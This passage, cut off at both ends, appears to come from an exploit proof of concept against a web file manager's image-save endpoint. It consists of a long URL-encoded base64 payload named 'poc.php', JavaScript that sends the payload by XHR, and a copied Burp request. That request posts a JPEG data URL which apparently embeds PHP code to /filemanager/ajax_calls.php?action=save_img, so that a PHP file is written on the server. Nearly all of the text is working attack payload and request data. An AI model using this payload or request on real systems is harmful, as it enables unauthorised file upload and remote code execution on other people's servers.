58%4f%63%39%36%35%66%58%39%50%4a%6b%38%31%52%67%41%63%34%72%71%38%5a%4f%61%71%58%73%41%6c%68%59%59%48%54%69%76%4f%78%32%48%35%36%62%4f%69%68%56%35%4a%70%0a%6e%6e%70%42%7a%78%31%46%49%44%6d%70%37%71%49%77%58%54%49%77%78%6b%38%43%6f%46%34%4a%7a%36%31%38%4e%69%61%54%6a%4e%6f%2b%6b%6f%79%55%6f%58%4a%59%7a%69%72%4d%54%65%39%56%46%50%4e%53%78%6e%6e%72%58%46%4f%4e%67%6b%74%43%38%70%7a%55%0a%36%39%4b%71%78%73%44%78%6d%72%4b%6e%6a%46%63%30%6b%63%30%30%50%46%50%57%6d%67%47%6e%71%4b%79%61%4d%5a%4d%65%42%33%70%77%41%78%7a%51%6f%47%4b%55%44%4f%66%72%55%32%4d%32%39%42%51%41%61%46%58%6d%70%46%55%59%35%4e%4f%41%46%57%6f%33%0a%4d%33%49%59%45%79%4b%63%45%46%53%41%41%69%6c%32%41%56%72%47%6d%54%7a%45%65%7a%4e%4c%73%34%71%51%41%41%55%6d%52%56%75%6d%72%42%7a%45%57%4d%38%55%62%4d%64%36%63%53%42%6d%6d%6c%75%4d%56%67%30%68%6f%61%52%54%43%4d%41%30%34%6b%30%30%0a%35%49%4e%5a%74%57%52%59%69%39%61%6a%59%64%61%65%4f%44%53%4d%44%69%6b%69%6b%52%45%63%56%47%77%35%36%43%70%54%78%54%43%70%39%4f%4b%75%4a%70%46%6b%4c%67%46%54%56%5a%6c%41%42%34%46%58%44%30%78%33%71%43%52%54%67%34%46%62%78%4e%59%73%0a%70%4d%41%48%79%4b%30%4e%4f%76%54%42%4b%44%6b%67%44%69%71%54%49%41%78%4a%70%67%4a%42%4a%78%78%58%71%59%58%46%2b%79%6b%74%53%61%6c%50%6e%52%33%6c%76%4f%73%30%59%4b%6b%45%34%71%77%42%78%58%48%36%64%71%4c%51%4d%4d%45%6c%63%34%4f%61%0a%36%6d%33%6e%45%73%59%59%48%4f%61%2b%33%77%4f%4e%6a%56%69%6c%63%38%65%74%53%63%47%79%66%42%6f%78%54%64%78%41%4a%70%77%4f%52%58%70%71%7a%32%4f%64%53%36%41%42%7a%54%73%30%30%64%61%64%6e%30%70%32%48%59%4f%31%4c%52%52%53%73%41%55%55%0a%55%55%77%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%45%6f%6f%78%52%69%67%41%34%6f%6f%78%52%55%36%49%42%4b%61%34%79%4d%48%76%54%71%52%78%38%75%65%34%70%54%73%34%74%4d%46%75%63%62%72%31%73%45%75%51%77%48%57%73%59%67%56%30%33%0a%69%4a%51%43%6a%64%79%61%35%63%6a%42%50%4a%36%31%38%48%6d%55%62%56%57%30%66%51%34%4b%54%6c%46%49%63%4f%74%53%70%31%71%45%45%67%31%4c%45%63%6e%6d%76%48%6b%37%6e%62%4b%78%61%69%36%31%62%57%71%63%5a%49%4e%57%30%4f%52%58%50%4a%48%4c%0a%4d%6d%57%70%42%55%61%6b%48%76%55%6e%53%73%6a%6d%6b%53%72%30%4e%4b%76%55%2f%57%6b%54%6f%61%46%36%2f%6a%57%62%64%6a%4d%6c%42%70%77%4e%4d%48%50%57%6e%43%72%68%49%6c%70%45%67%4f%42%53%35%70%6d%61%4d%34%72%58%32%69%52%46%68%78%50%46%0a%4e%42%35%70%75%66%70%52%78%36%31%4d%71%6a%65%77%57%51%5a%70%70%50%42%70%61%61%65%75%4b%79%62%59%30%67%70%44%30%6f%7a%69%6b%4a%79%4b%69%37%5a%61%51%67%36%30%4e%30%6f%78%7a%53%45%38%55%30%55%69%4d%6a%6d%6d%6b%39%71%65%66%55%56%47%0a%63%6b%31%53%64%69%30%4e%49%77%61%69%66%42%37%56%4d%63%39%43%42%54%47%41%72%61%4d%6b%61%4a%6c%56%6b%7a%6d%6f%57%54%49%49%71%34%51%4d%47%6f%48%48%4a%4e%57%6e%71%61%51%6b%56%67%51%6f%4b%67%38%35%72%5a%30%6e%55%57%69%59%52%4d%63%67%0a%38%35%4e%5a%42%51%42%69%63%63%30%41%6c%57%79%70%49%4e%65%70%67%38%5a%4b%6c%4a%57%65%68%6e%56%6f%71%61%4f%39%69%6c%45%69%35%42%71%52%52%58%4d%61%54%71%76%6c%6e%79%35%54%2b%4e%64%4a%46%4b%72%72%6b%45%45%56%39%74%67%4d%5a%47%70%46%0a%58%65%70%34%74%61%6b%34%79%4a%4d%63%30%6f%37%30%6d%63%39%4d%59%6f%42%7a%6d%76%53%62%5a%6b%4f%6f%70%4d%30%5a%70%58%59%57%48%55%55%55%56%59%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%53%55%55%41%46%47%4b%4b%54%74%53%53%0a%75%41%74%4e%50%51%2f%53%6c%7a%78%54%48%62%43%6b%39%67%4b%69%70%4e%52%69%37%6a%53%31%73%63%7a%34%6b%66%35%6f%77%50%57%75%63%63%59%4e%61%4f%72%33%4a%6c%76%53%41%63%67%47%73%34%38%6d%76%67%63%78%71%63%31%56%32%50%6f%4d%46%46%78%69%0a%4a%6a%35%53%61%6b%69%36%30%77%63%6a%46%54%49%4b%38%71%52%32%4d%6d%53%72%53%48%69%71%79%44%6d%72%43%39%4b%35%35%48%4c%4d%6d%54%49%4e%54%4b%32%54%69%6f%6c%35%46%54%4a%77%4f%6c%5a%4d%77%61%4a%45%36%47%6c%58%76%54%51%61%63%66%61%73%0a%57%5a%32%48%67%30%6f%4e%4d%48%53%67%44%6e%72%54%54%73%54%59%6b%42%70%43%54%53%41%59%70%4f%39%4f%39%78%4e%44%73%34%6f%33%55%6d%61%4d%30%58%45%4b%44%54%63%38%30%6f%50%57%6d%6b%30%72%33%47%6b%47%61%54%50%4e%4c%54%65%78%6f%73%56%59%0a%55%55%30%30%43%6b%7a%56%4a%46%49%51%30%77%6b%5a%70%2b%65%4b%5a%36%30%50%63%6f%44%79%52%54%53%4b%4f%2b%61%55%38%69%72%51%30%52%34%7a%6d%6f%6d%51%59%4e%54%73%4d%43%6f%32%47%51%61%75%4c%4e%49%73%71%75%76%4e%52%73%43%4f%67%79%61%73%0a%73%50%61%6f%69%75%54%57%79%62%53%30%4e%6b%31%62%55%67%49%4f%4d%6a%68%71%31%39%4d%31%49%77%73%49%35%57%50%50%48%57%73%74%68%69%6d%44%48%59%6e%4e%64%2b%44%78%30%36%55%6c%72%6f%59%31%71%43%6b%72%6f%37%79%47%56%5a%41%43%44%31%71%64%0a%65%39%63%54%61%61%6e%50%61%75%41%53%53%75%65%63%6d%75%6f%74%4c%31%4c%68%51%77%62%6e%48%49%72%37%4c%42%5a%6c%47%70%47%7a%65%70%35%46%58%44%75%4c%75%61%46%46%4d%44%5a%47%52%52%6b%69%76%59%6a%4a%53%56%30%63%31%72%61%45%6c%46%46%4a%0a%32%71%67%44%49%70%61%53%67%55%41%4c%52%52%52%51%41%55%5a%70%4f%31%47%61%56%77%41%39%61%4b%4b%4b%47%77%45%7a%52%6d%6a%71%4b%61%53%42%53%75%6f%71%37%46%71%33%5a%43%6b%67%64%61%7a%4e%54%76%55%68%69%5a%51%32%47%49%34%46%4c%66%61%69%0a%6c%74%47%53%43%4d%31%79%56%35%64%53%33%4d%70%6b%4c%48%47%4f%42%58%67%35%6a%6a%31%47%4c%55%57%64%75%47%77%37%6c%4a%4e%6c%5a%33%4d%6a%75%57%2b%38%54%78%55%66%58%70%53%37%2b%65%6e%4e%43%67%35%72%34%2b%74%56%35%70%4e%6e%76%30%6f%38%0a%73%62%44%6c%55%67%38%69%70%6f%77%52%54%56%55%69%70%6c%46%59%53%59%53%6c%30%48%6f%4b%6e%48%54%69%6f%6c%42%34%78%55%36%44%69%75%65%52%7a%79%4a%59%2b%6c%50%42%41%4f%4b%6a%55%34%70%77%35%4f%61%79%65%70%67%79%55%45%65%74%50%7a%6b%56%0a%45%70%47%61%6b%7a%55%57%52%4c%51%38%45%59%6f%35%70%6f%4e%4c%6d%70%61%4a%61%48%41%34%48%4e%47%51%54%6d%6d%35%70%52%30%4e%53%54%59%55%6b%5a%36%30%5a%48%72%54%54%31%6f%7a%54%51%57%46%79%42%31%70%4d%35%36%55%68%36%55%44%37%74%4e%4a%0a%44%53%46%37%55%6d%65%43%4b%64%54%54%33%71%6b%4d%51%55%33%50%57%6e%44%76%53%45%55%72%74%4d%61%45%4a%34%4e%4e%50%65%6c%50%51%30%30%39%54%54%4b%45%37%55%69%39%65%61%57%6b%46%57%55%42%47%65%6c%52%39%42%55%68%70%68%36%30%31%6f%4e%61%0a%45%62%43%6d%59%41%42%7a%31%71%51%69%6f%79%44%6d%74%6f%76%51%30%54%36%45%54%6a%50%53%6f%63%44%42%7a%77%61%73%45%47%6d%6b%44%48%53%72%55%6a%57%4c%30%73%56%31%4a%47%63%38%31%62%74%72%70%37%59%67%6f%63%35%50%49%71%45%72%6e%49%48%57%0a%6d%46%54%32%37%56%76%52%78%4d%71%55%72%70%6b%56%4b%61%6b%6a%72%72%48%55%59%35%55%43%73%32%47%50%55%56%70%71%51%52%77%61%34%4b%4b%56%6b%59%59%59%68%68%30%72%64%30%2f%56%75%41%6b%78%78%37%31%39%5a%67%4d%33%69%30%6c%4e%6e%6b%56%73%0a%4d%30%37%6f%36%4f%6a%4a%78%52%52%58%30%35%78%42%6a%69%6a%50%57%6c%70%50%57%67%41%6f%6f%6f%6f%41%51%35%78%78%31%70%4d%34%34%50%57%68%69%41%43%63%34%48%72%56%52%72%32%47%4d%6e%63%34%34%72%4f%64%53%4d%4e%78%71%4c%65%78%62%79%50%78%0a%6f%4c%41%44%6b%31%69%33%47%75%77%52%73%51%47%42%4f%4b%79%37%6a%78%42%4d%35%49%69%47%52%58%6e%56%38%78%68%41%32%6a%51%6b%7a%71%47%6e%56%43%63%73%41%50%63%31%6b%36%6a%72%45%63%53%73%71%45%46%7a%30%72%6e%70%62%36%65%62%4a%64%79%76%0a%34%31%56%4c%67%38%73%53%66%65%76%47%72%35%77%35%4a%70%48%62%52%77%57%74%32%54%58%4e%79%38%37%45%6c%69%51%66%65%71%78%4a%4f%42%6b%34%41%70%32%42%31%46%41%41%50%4e%66%50%56%36%38%71%6b%6d%32%7a%31%71%64%4b%4d%45%4e%41%39%71%6c%55%0a%43%6b%43%31%49%71%31%79%4e%74%61%6c%4f%58%51%63%41%43%4d%56%49%6f%46%4e%55%56%49%71%31%4c%6c%63%79%6b%79%52%63%59%71%55%44%49%71%4e%56%71%56%54%67%56%6d%39%54%47%54%46%41%70%77%47%42%53%65%39%4c%6d%73%7a%4a%69%67%38%31%49%44%78%0a%6d%6f%73%38%30%34%48%69%70%41%66%75%49%70%64%33%30%70%6f%36%47%6c%71%57%53%30%4c%6b%2b%67%70%51%35%36%59%70%6f%36%34%70%77%46%54%59%6b%58%4a%4a%6f%7a%69%6b%78%7a%51%65%6c%57%6b%41%76%4a%36%30%6f%41%39%61%4f%32%61%51%39%43%4b%64%0a%67%46%79%41%4f%74%4e%7a%6b%30%63%30%67%47%44%52%59%42%77%41%48%65%6b%4a%39%4b%52%6a%67%55%6d%43%42%6d%6f%36%6a%51%68%7a%69%6d%38%30%2f%49%78%69%6d%6b%56%5a%51%33%71%4b%41%4b%58%46%4c%56%44%51%7a%69%6d%6e%32%70%78%58%6b%30%67%58%0a%6d%6c%63%45%78%70%48%47%65%39%4d%41%4a%42%70%37%64%63%55%6d%43%42%78%57%71%64%6b%57%6d%52%6b%48%30%71%4a%69%52%6e%67%56%4d%51%61%59%56%6f%54%4e%49%73%69%49%79%44%54%4d%45%5a%71%63%71%41%43%61%6a%49%48%4e%57%6d%74%6d%57%6e%71%51%0a%6c%63%6e%50%51%2b%74%4f%44%46%52%79%63%2b%39%4b%51%63%38%55%68%41%78%7a%57%6b%57%31%73%78%75%4b%65%35%2f%2f%32%51%3d%3d%0a&path=&name=poc.php"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); ``` here a copy of the burp request: ``` POST /filemanager/ajax_calls.php?action=save_img HTTP/1.1 Host: 192.168.0.29:3001 Content-Length: 56764 Accept: */* Origin: http://192.168.0.29:3001 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.0.29:3001/filemanager/dialog.php?type=0&lang=en_EN&popup=0&crossdomain=0&relative_url=0&akey=key&fldr=&5e6bc715afb8e&1584125986912 Accept-Encoding: gzip, deflate Cookie: last_position=%2F; PHPSESSID=kn4afea6j9n4edic7ls3ji9838 Connection: close url=data:image/jpeg;base64,%2f%39%6a%2f%34%51%42%32%52%58%68%70%5a%67%41%41%54%55%30%41%4b%67%41%41%41%41%67%41%42%51%45%61%41%41%55%41%41%41%41%42%41%41%41%41%53%67%45%62%41%41%55%41%41%41%41%42%41%41%41%41%55%67%45%6f%41%41%4d%41%41%41%41%42%41%41%49%41%0a%41%41%45%37%41%41%49%41%41%41%41%55%41%41%41%41%57%67%49%54%41%41%4d%41%41%41%41%42%41%41%45%41%41%41%41%41%41%41%41%41%41%41%42%49%41%41%41%41%41%51%41%41%41%45%67%41%41%41%41%42%50%44%39%77%61%48%41%67%63%47%68%77%61%57%35%6d%0a%62%79%67%70%4f%79%41%2f%50%67%44%2f%32%77%43%45%41%41%67%47%42%67%63%47%42%51%67%48%42%77%63%4a%43%51%67%4b%44%42%51%4e%44%41%73%4c%44%42%6b%53%45%77%38%55%48%52%6f%66%48%68%30%61%48%42%77%67%4a%43%34%6e%49%43%49%73%49%78%77%63%0a%4b%44%63%70%4c%44%41%78%4e%44%51%30%48%79%63%35%50%54%67%79%50%43%34%7a%4e%44%49%42%43%51%6b%4a%44%41%73%4d%47%41%30%4e%47%44%49%68%48%43%45%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%0a%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%6a%49%79%4d%76%2f%41%41%42%45%49%41%5a%41%42%6b%41%4d%42%49%67%41%43%45%51%45%44%45%51%48%2f%78%41%47%69%41%41%41%42%42%51%45%42%0a%41%51%45%42%41%51%41%41%41%41%41%41%41%41%41%41%41%51%49%44%42%41%55%47%42%77%67%4a%43%67%73%51%41%41%49%42%41%77%4d%43%42%41%4d%46%42%51%51%45%41%41%41%42%66%51%45%43%41%77%41%45%45%51%55%53%49%54%46%42%42%68%4e%52%59%51%63%69%0a%63%52%51%79%67%5a%47%68%43%43%4e%43%73%63%45%56%55%74%48%77%4a%44%4e%69%63%6f%49%4a%43%68%59%58%47%42%6b%61%4a%53%59%6e%4b%43%6b%71%4e%44%55%32%4e%7a%67%35%4f%6b%4e%45%52%55%5a%48%53%45%6c%4b%55%31%52%56%56%6c%64%59%57%56%70%6a%0a%5a%47%56%6d%5a%32%68%70%61%6e%4e%30%64%58%5a%33%65%48%6c%36%67%34%53%46%68%6f%65%49%69%59%71%53%6b%35%53%56%6c%70%65%59%6d%5a%71%69%6f%36%53%6c%70%71%65%6f%71%61%71%79%73%37%53%31%74%72%65%34%75%62%72%43%77%38%54%46%78%73%66%49%0a%79%63%72%53%30%39%54%56%31%74%66%59%32%64%72%68%34%75%50%6b%35%65%62%6e%36%4f%6e%71%38%66%4c%7a%39%50%58%32%39%2f%6a%35%2b%67%45%41%41%77%45%42%41%51%45%42%41%51%45%42%41%51%41%41%41%41%41%41%41%41%45%43%41%77%51%46%42%67%63%49%0a%43%51%6f%4c%45%51%41%43%41%51%49%45%42%41%4d%45%42%77%55%45%42%41%41%42%41%6e%63%41%41%51%49%44%45%51%51%46%49%54%45%47%45%6b%46%52%42%32%46%78%45%79%49%79%67%51%67%55%51%70%47%68%73%63%45%4a%49%7a%4e%53%38%42%56%69%63%74%45%4b%0a%46%69%51%30%34%53%58%78%46%78%67%5a%47%69%59%6e%4b%43%6b%71%4e%54%59%33%4f%44%6b%36%51%30%52%46%52%6b%64%49%53%55%70%54%56%46%56%57%56%31%68%5a%57%6d%4e%6b%5a%57%5a%6e%61%47%6c%71%63%33%52%31%64%6e%64%34%65%58%71%43%67%34%53%46%0a%68%6f%65%49%69%59%71%53%6b%35%53%56%6c%70%65%59%6d%5a%71%69%6f%36%53%6c%70%71%65%6f%71%61%71%79%73%37%53%31%74%72%65%34%75%62%72%43%77%38%54%46%78%73%66%49%79%63%72%53%30%39%54%56%31%74%66%59%32%64%72%69%34%2b%54%6c%35%75%66%6f%0a%36%65%72%79%38%2f%54%31%39%76%66%34%2b%66%72%2f%32%67%41%4d%41%77%45%41%41%68%45%44%45%51%41%2f%41%50%66%36%4b%4b%4b%41%43%6a%74%52%52%51%41%30%39%44%53%30%68%36%47%6c%46%49%41%6f%70%4f%31%4c%6b%41%64%61%59%57%47%6b%43%67%41%43%0a%6a%67%30%68%46%4a%75%51%63%77%75%61%4d%6a%4e%4e%48%70%54%4a%4a%55%51%66%4d%77%47%50%55%31%44%71%52%69%72%74%68%47%38%69%51%34%78%79%4b%54%4b%34%7a%2f%4f%73%57%2f%31%79%4f%33%42%43%4d%47%50%74%57%44%64%61%39%63%58%42%79%72%47%4d%0a%41%59%77%4f%2f%76%58%6e%31%38%79%70%30%30%37%4d%33%6a%68%33%49%37%43%34%76%34%4c%66%2f%57%79%71%50%78%72%4f%6d%31%2b%32%69%42%49%4f%37%30%78%58%48%53%79%79%7a%74%6c%33%4c%2f%55%31%46%6b%45%34%47%65%4f%4f%61%38%69%76%6e%44%65%78%0a%32%55%38%45%32%74%54%71%58%38%56%51%48%49%45%62%45%2b%75%44%55%44%2b%4a%46%49%2b%52%63%48%33%72%42%55%45%44%6f%4d%66%53%6b%38%6f%45%35%49%72%7a%35%5a%70%4b%57%35%73%73%48%59%31%58%38%51%58%4a%50%41%58%48%30%71%4a%74%62%75%57%37%0a%44%38%71%70%65%55%43%4f%41%52%37%55%43%49%44%71%44%58%4c%4c%48%74%6d%6b%63%4d%6b%4f%65%35%6b%6e%42%42%41%41%50%57%70%49%4e%51%6c%73%78%69%4d%41%2b%35%71%50%79%53%65%41%65%44%33%70%44%43%46%42%41%79%77%37%31%6b%73%62%4a%4f%35%6f%0a%36%4e%31%59%31%49%50%45%56%77%68%42%64%51%56%39%68%57%6e%42%34%6e%74%70%57%43%73%68%55%2b%70%48%46%63%73%55%41%35%42%49%39%73%55%30%67%6b%63%6a%41%39%41%4f%74%65%68%52%7a%57%55%46%71%63%38%38%48%66%55%39%41%68%31%47%33%6e%47%46%0a%6c%56%73%39%67%61%74%69%51%59%35%35%2b%6c%65%61%51%50%4a%44%4a%75%6a%4a%58%33%7a%57%76%61%36%2f%63%78%45%5a%2b%59%44%67%6b%31%37%47%47%7a%61%4d%74%7a%6b%71%59%56%72%59%37%58%64%6b%63%44%69%6e%44%6d%73%71%78%31%61%4b%37%55%41%73%0a%41%78%37%56%70%71%77%49%34%4f%63%2b%6c%65%78%52%78%4d%61%69%75%6d%63%6b%6f%4f%4f%67%34%44%72%52%74%70%63%2b%6c%48%4e%64%56%39%4e%43%55%32%4b%4b%57%6d%67%30%36%67%51%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%0a%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%48%61%6a%4e%4a%6d%6b%41%68%36%47%6c%46%4a%32%6f%79%61%51%41%65%68%70%76%54%72%54%73%30%78%7a%6a%75%41%4b%55%70%4b%43%75%77%57%72%0a%73%68%63%6a%47%52%31%71%4b%53%64%59%31%79%37%41%44%36%31%6d%33%32%73%51%32%6f%4b%68%73%73%4b%35%6e%55%4e%5a%6c%75%56%49%47%51%50%61%76%4a%78%4f%5a%52%70%33%73%7a%70%70%34%65%55%74%54%62%31%44%78%43%6b%53%6c%59%44%75%50%53%75%64%0a%75%4e%54%75%5a%77%53%37%48%42%37%41%31%54%33%45%6a%70%7a%36%30%41%4d%65%51%54%6d%76%6e%63%54%6d%55%35%33%73%7a%30%61%57%47%6a%48%63%55%76%76%35%59%6e%50%76%53%71%6f%59%64%61%65%73%52%4f%43%63%6d%72%43%32%34%47%4d%41%38%31%35%55%0a%36%38%6e%71%32%64%4b%70%71%4f%71%4b%77%69%78%36%31%4d%73%51%49%34%46%57%30%67%42%48%49%4e%53%4c%43%42%30%46%63%37%72%4d%72%6e%73%72%46%52%59%54%6e%4f%4b%6b%45%52%39%4b%74%69%50%41%36%55%34%4a%39%61%79%6c%55%62%64%79%65%64%6c%52%0a%59%73%67%35%48%4e%4b%49%67%54%79%4b%74%62%42%36%47%6c%32%67%39%73%55%76%61%43%39%6f%79%6f%49%63%5a%34%70%44%44%6e%6a%70%37%31%63%32%59%37%56%48%49%6f%32%6b%5a%70%78%71%4e%6a%55%32%55%6d%6a%32%35%2b%59%47%6f%6d%77%65%70%46%57%47%0a%69%33%48%47%4b%65%6c%6b%43%63%6b%67%56%71%70%33%30%5a%61%71%61%61%6c%45%67%44%6f%61%59%52%7a%6a%6f%44%57%6f%62%47%50%48%55%56%58%6d%73%6d%55%5a%51%35%2b%74%62%51%6d%31%73%79%47%34%79%4b%36%79%4e%43%77%4b%4f%52%6a%30%4e%62%6d%6e%0a%36%37%4a%47%56%53%54%6b%65%70%72%42%77%56%4f%47%58%6d%6a%47%44%6c%69%52%36%59%72%76%6f%59%36%64%4a%32%54%30%4d%61%74%43%4d%6c%6f%65%68%32%31%31%48%4f%67%5a%47%42%7a%2f%41%44%71%63%6b%67%5a%72%67%37%4c%55%4a%4c%5a%68%68%75%43%63%0a%34%4a%72%72%62%4c%55%59%37%6c%52%38%77%33%59%36%5a%72%36%72%41%35%68%47%6f%72%53%5a%35%64%57%68%4b%42%6f%72%53%39%36%61%72%41%2b%6c%4c%6e%30%72%32%46%4a%4e%58%52%7a%44%71%4b%54%4e%41%6f%54%41%57%69%69%69%6d%41%55%55%55%55%41%46%0a%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%52%52%52%51%41%55%55%55%55%41%46%46%46%46%41%42%53%55%74%49%65%74%41%43%64%71%53%6c%50%53%6f%33%6b%43%67%2b%31%52%4f%61%68%47%37%42%4a%76%51%56%32%43%4b%53%54%67%43%0a%75%65%31%62%57%51%68%4d%63%54%63%39%44%53%61%76%72%49%6a%52%6f%6f%7a%6c%6a%78%58%4b%79%79%4d%51%7a%5a%79%78%50%63%31%38%2f%6a%38%66%6f%31%46%6e%66%68%38%4e%66%56%69%7a%54%73%37%4d%57%62%4a%4a%37%31%43%48%4a%4f%42%69%6d%39%51%43%0a%65%74%53%78%4a%69%76%6d%61%6c%65%55%37%74%6e%71%52%70%71%4b%30%42%59%6d%4e%57%59%6f%44%6a%4a%70%59%59%7a%6d%72%6b%61%63%59%72%69%6e%55%30%4b%65%68%48%44%45%54%6b%59%71%77%49%77%4f%4d%56%49%6b%5a%41%34%70%34%58%46%63%73%70%33%49%0a%63%78%71%4b%41%4f%6c%4f%43%47%70%46%46%4f%41%46%5a%75%52%6b%35%61%6b%65%77%34%6f%43%69%70%51%42%69%67%44%32%71%58%49%58%4d%4d%32%30%62%61%6b%41%78%32%70%63%66%53%6c%7a%43%35%69%75%77%4f%63%43%6f%32%69%59%6e%46%57%74%74%4e%77%52%0a%6b%69%74%49%53%51%31%49%72%37%51%67%78%6a%6d%6f%79%72%4d%63%6e%50%48%46%57%43%68%4c%5a%4e%4b%51%41%4f%4b%76%6e%4b%55%69%41%49%4d%63%6b%30%68%44%4b%44%67%35%46%54%37%66%6c%70%6f%54%4f%61%61%6b%33%73%50%6d%53%4b%55%67%44%41%35%55%0a%41%2b%74%56%6d%69%49%4a%4c%39%4f%31%61%62%52%5a%79%4b%67%6b%69%47%44%57%73%61%6a%53%31%4c%68%4e%4d%6f%59%2b%59%41%64%4b%6e%74%37%6c%37%61%63%46%57%49%48%31%70%72%78%34%4f%52%31%71%42%73%6b%38%6a%46%64%32%47%78%55%6f%37%43%71%55%0a%31%4a%48%63%61%66%71%4d%64%79%67%77%63%6b%44%6d%74%46%57%7a%30%36%56%35%35%62%58%62%32%30%6f%5a%53%63%41%39%6a%58%5a%61%5a%71%4b%33%63%51%79%52%75%41%36%56%39%66%6c%2b%59%52%6e%61%4c%5a%35%4f%49%6f%4f%4f%71%4e%51%48%69%6c%42%70%0a%67%49%4a%39%71%55%64%2b%76%57%76%63%54%54%31%52%79%57%48%30%55%67%36%55%74%4d%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%6b%50%57%6c%70%70%0a%6f%46%73%49%54%6a%6b%31%68%61%78%71%59%67%55%78%6f%63%73%52%57%74%64%54%43%4b%49%73%54%58%43%33%39%78%35%38%37%4d%43%54%67%6b%56%34%6d%5a%34%76%6b%69%30%6a%72%77%31%4e%53%64%32%56%4a%5a%6d%5a%32%64%75%57%71%73%70%4a%59%6e%4a%77%0a%61%63%78%59%35%48%59%30%49%76%4f%54%58%79%4d%35%75%62%75%32%65%78%46%4b%4b%73%68%59%6b%79%53%44%33%50%46%58%49%34%6c%48%42%50%4e%56%39%34%56%63%41%5a%4e%54%52%68%32%58%4f%44%6d%75%65%62%75%72%47%30%62%46%6d%49%59%7a%69%72%53%41%0a%31%54%69%33%6a%71%44%56%71%4a%7a%6e%42%72%6a%6b%69%4a%4d%74%4c%67%4c%69%6c%41%4f%54%6d%6b%51%5a%47%61%6b%51%41%35%2b%74%63%7a%33%4f%5a%73%56%52%67%63%30%6f%58%4e%4f%77%4d%55%6f%46%5a%74%6d%62%45%77%42%52%53%6b%55%41%55%4b%34%72%0a%69%59%4a%48%46%4c%67%2b%6c%4f%48%41%70%63%55%68%58%47%34%47%4b%61%52%78%78%54%38%55%59%71%6b%32%68%70%6b%52%55%48%72%54%47%41%47%41%4f%63%6e%41%71%59%69%6f%6e%4a%51%35%49%2b%58%48%36%31%63%49%75%55%6b%6b%4e%79%73%72%6a%4d%71%4d%0a%4b%54%79%52%6d%6f%5a%4c%32%32%68%63%4a%4a%4b%6f%59%39%42%6d%75%47%38%65%65%4e%42%6f%73%66%32%53%32%59%47%63%63%45%35%35%47%61%38%65%75%2f%45%2b%70%7a%7a%46%6d%75%35%38%6b%35%47%47%36%56%39%54%67%4d%6a%64%57%50%4d%39%44%43%56%64%0a%49%2b%6e%42%4e%45%2f%43%75%70%7a%30%77%63%30%4d%67%49%79%65%6e%71%61%2b%62%39%4b%38%61%36%31%59%54%71%36%7a%79%53%41%64%6e%4f%51%52%58%71%50%68%58%34%6a%32%2b%72%67%57%55%35%43%54%48%71%5a%43%4d%5a%39%71%36%61%2b%51%79%69%74%44%0a%4b%4f%4c%61%64%6a%75%48%67%7a%79%4f%75%4b%70%79%52%45%6b%67%6a%46%58%6f%72%6d%4b%54%43%68%73%6b%63%41%35%34%50%30%6f%6c%54%65%63%4d%4d%44%31%46%65%4a%58%77%56%57%67%39%56%6f%64%31%48%45%4b%65%6a%5a%6b%37%47%53%55%67%39%4b%74%61%0a%62%64%74%62%58%4f%34%4e%77%44%30%70%4a%49%38%5a%4a%36%64%4b%71%73%6d%43%63%6b%67%48%76%56%59%57%75%36%63%6b%37%6d%39%53%43%6d%72%48%6f%4e%6e%64%70%50%43%47%55%67%38%63%31%62%33%41%6a%49%72%68%74%48%31%4d%32%6b%34%56%6d%4a%51%6e%0a%48%4e%64%6e%44%4b%73%71%68%6c%49%77%77%7a%58%33%57%41%78%69%71%77%53%65%35%34%31%65%6b%34%53%30%32%4c%41%49%78%51%44%54%51%6f%39%61%57%76%54%39%44%6e%48%5a%6f%70%42%31%70%61%41%43%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%43%0a%69%69%69%67%41%6f%6f%6f%6f%41%4b%4b%4b%4b%41%45%7a%52%6e%4a%78%54%63%66%57%6c%41%6f%41%57%6d%73%65%4b%63%61%6a%63%34%55%6e%30%47%61%69%70%4c%6c%69%32%4e%4b%37%4d%4c%58%62%30%78%71%49%31%78%67%39%53%65%74%63%6c%4d%77%41%50%75%61%0a%31%64%57%6e%4d%74%77%33%6f%44%57%4b%2b%58%4e%66%44%35%6a%57%63%36%6a%52%36%2b%46%70%71%31%78%71%6a%4a%79%53%63%65%6c%50%2b%37%77%77%77%44%30%78%54%51%4d%44%46%57%4c%61%4c%7a%54%6c%2b%67%36%56%35%55%70%4e%61%48%62%59%66%62%77%41%0a%6e%63%32%63%64%71%73%71%56%44%59%41%34%70%48%59%59%32%4c%32%34%71%57%4b%49%62%65%61%35%35%53%43%34%39%47%42%34%32%69%70%51%69%6e%31%42%70%71%52%41%56%4b%41%41%63%31%7a%79%6e%63%79%63%68%79%5a%35%42%48%46%53%49%43%4d%2f%57%6b%47%0a%42%55%67%48%53%73%4a%4d%79%6b%4b%42%6b%63%30%34%44%46%43%6a%69%6e%34%39%71%7a%33%5a%6b%32%4d%50%53%67%66%53%6e%59%34%6f%41%71%78%58%44%48%46%41%47%61%64%6a%67%30%41%55%43%47%59%70%53%4d%41%6b%63%6d%6e%45%63%55%68%4f%41%61%61%51%0a%30%78%68%4a%78%79%4b%71%33%62%68%49%47%59%6b%2f%4b%43%63%64%71%74%4e%79%4b%70%33%71%48%37%48%4d%63%64%56%49%46%64%57%44%74%37%56%58%46%4a%71%32%70%38%33%65%4e%74%51%4e%3